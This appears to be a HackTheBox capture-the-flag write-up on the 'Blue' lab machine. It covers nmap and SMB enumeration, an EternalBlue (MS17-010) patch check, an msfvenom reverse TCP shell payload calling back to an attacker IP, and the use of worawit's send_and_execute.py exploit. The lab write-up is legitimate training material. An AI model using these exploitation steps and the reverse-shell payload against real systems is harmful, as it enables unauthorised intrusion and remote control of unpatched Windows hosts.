HackTheBox Blue Writeup

Enjoy reading my HTB Blue Writeup

Information Gathering

Let's begin with a nmap scan to gather some information about the HTB Blue machine:

sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.40

We have three open ports:

Port 135: Microsoft Windows RPC
Port 139: Microsoft Windows netbios-ssn
Port 445: Microsoft-DS (Windows 7 Professional 7601 SP1)

Okay so there does not seem to be an Active Directory running but we have a Windows machine with Windows 7 Professional SP1 installed.

Next, enumerate the SMB shares:

smbclient -L \\\\10.10.10.40\\

Without entering a password we were able to list the shares:

0Enter WORKGROUP\user's password: 
1
2	Sharename       Type      Comment
3	---------       ----      -------
4	ADMIN$          Disk      Remote Admin
5	C$              Disk      Default share
6	IPC$            IPC       Remote IPC
7	Share           Disk      
8	Users           Disk

I investigated the "Share" and "Users" share but couldn't find anything interesting. Let's keep in mind that we are able to connect to those and move on.

Eternal Blue

I used the python checker script from worawit's github repository in order to check whether the HTB Blue machine got patched or is vulnerable to Eternal Blue. In fact, it didn't get patched:

 0└──╼ $python checker.py 10.10.10.40 445
 1Trying to connect to 10.10.10.40:445
 2Target OS: Windows 7 Professional 7601 Service Pack 1
 3The target is not patched
 4
 5=== Testing named pipes ===
 6spoolss: STATUS_ACCESS_DENIED
 7samr: STATUS_ACCESS_DENIED
 8netlogon: STATUS_ACCESS_DENIED
 9lsarpc: STATUS_ACCESS_DENIED
10browser: STATUS_ACCESS_DENIED

Generate a payload using msfvenom in order to gain a reverse tcp shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=9988 -f exe > payload.exe

Next we have to modify the send_and_execute.py script from worawit.

Replace username='' with username='guest'.

Then we can start a netcat listener and send the payload to the target machine:

python send_and_execute.py 10.10.10.40 payload.exe 445

The user flag is located in C:\Users\haris\Desktop and the root flag in the Desktop directory of Administrator.

Tags:

HTB, HackTheBox, Blue, MS17-010